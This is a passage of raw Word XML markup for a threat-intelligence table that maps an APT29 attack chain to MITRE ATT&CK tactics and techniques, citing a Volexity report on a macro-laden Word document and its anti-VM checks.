          </w:tcPr>
          <w:p w14:paraId="4574B6CE" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2995D747" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="74707B7B" w14:textId="6218D229" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00235021">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_00</w:t>
            </w:r>
            <w:r w:rsidR="00BF779A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A3E22D5" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5CCB16AD" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7631C7C1" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6EC9404E" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="39B4E0A7" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="002D1D50" w14:paraId="03926276" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11247A47" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F73BD5A" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5633EB14" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20CE3FC0" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2370684B" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5DB9EC" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B260CF" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E38C961" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="002D1D50" w14:paraId="1D4461B2" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D802A4" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76EA02C6" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7964C9" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E1C3A6C" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BFA4568" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B459081" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C58A05" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="334C9D89" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="26DF2486" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6364A3BB" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26EA345F" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E7E886" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38CFFF26" w14:textId="47A37DC0" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="009E476C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E7C1D91" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A86F61B" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469C26A6" w14:textId="505B159C" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00C80BA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F839B06" w14:textId="63DBB8EB" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00E76A45" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The second attack wave that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Volexity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> observed leveraged a Microsoft Word document with a malicious embedded macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F42AF" w:rsidRPr="009F42AF" w14:paraId="3A7372B9" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7555F888" w14:textId="2E49B191" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2C746F" w14:textId="03155654" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r w:rsidR="00EA0540">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A7BD06C" w14:textId="557CC3A1" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1497 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Virtualization/Sandbox Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF769B8" w14:textId="409CE153" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109F9150" w14:textId="77777777" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549658E4" w14:textId="7A05097B" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26DD10D3" w14:textId="1F61CFF5" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="00C80BA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DB3B02" w14:textId="3B67D29D" w:rsidR="005C6AF2" w:rsidRPr="009F42AF" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] The Macros contain several anti-VM checks designed to avoid executing in virtualized environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="4C7AACCE" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5988FF85" w14:textId="2DA3E861" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
